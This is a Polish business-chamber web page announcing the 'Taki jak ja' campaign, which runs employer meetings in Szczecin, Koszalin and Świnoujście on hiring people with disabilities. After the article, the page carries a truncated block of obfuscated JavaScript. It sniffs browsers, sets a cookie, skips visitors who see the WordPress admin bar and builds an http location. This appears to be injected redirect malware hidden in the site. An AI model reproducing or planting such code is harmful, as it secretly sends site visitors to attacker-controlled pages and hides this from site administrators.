Kampania Taki Jak Ja | Północna Izba Gospodarcza w Koszalinie

„Szukasz pracowników? Poznaj korzyści zatrudniania osób z niepełnosprawnością, wejdź na www.takijakja.pl i weź udział w spotkaniach” – pod tym hasłem rozpoczęła się 1 sierpnia kampania społeczna „Taki jak ja”, realizowana przez Fundację Pod Aniołem.

Od sierpnia do listopada w Szczecinie, Koszalinie i Świnoujściu organizowane będą spotkania, podczas których będzie można uzyskać informacje na temat korzyści i specyfiki zatrudniania osób z niepełnosprawnością. Przybliżona zostanie wiedza na temat warunków zatrudniania, jak również profitów i refundacji przysługujących z tego tytułu.

Harmonogram spotkań można znaleźć na stronie www.takijakja.pl oraz Facebooku.

Spotkania organizują Fundacja Pod Aniołem wspólnie ze Związkiem Liderów Sektora Usług Biznesowych ABSL, Związkiem Pracodawców Pomorza Zachodniego, Północną Izbą Gospodarczą i Siecią Zachodniopomorską Ośrodków Wsparcia Ekonomii Społecznej.

Pracodawcy zachęcają

W ramach kampanii powstały spoty prezentujące pracodawców zatrudniających osoby z niepełnosprawnością. Bohaterami filmików pokazujących dobre praktyki są: Spółdzielnia Socjalna Nowa Przystań, 4C Centrum Ekonomii Społecznej i PDC Logistics.

– Wierzymy w to, że niepełnosprawność nie powinna wpływać na postrzeganie drugiego człowieka. Osoba z niepełnosprawnościami jest często zdeterminowana i samodzielna, posiada przyjaciół, jest radosna, odważna, aktywna, pełna marzeń i pasji. Nadto jest lojalna i dba o swoje miejsce pracy lub nauki, chce się uczyć. Osoba z niepełnosprawnością jest TAKA JAK JA – mówi Andrzej Smoliński, koordynator kampanii.

Kampania finansowana ze środków PFRON przekazanych za pośrednictwem Województwa Zachodniopomorskiego.

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m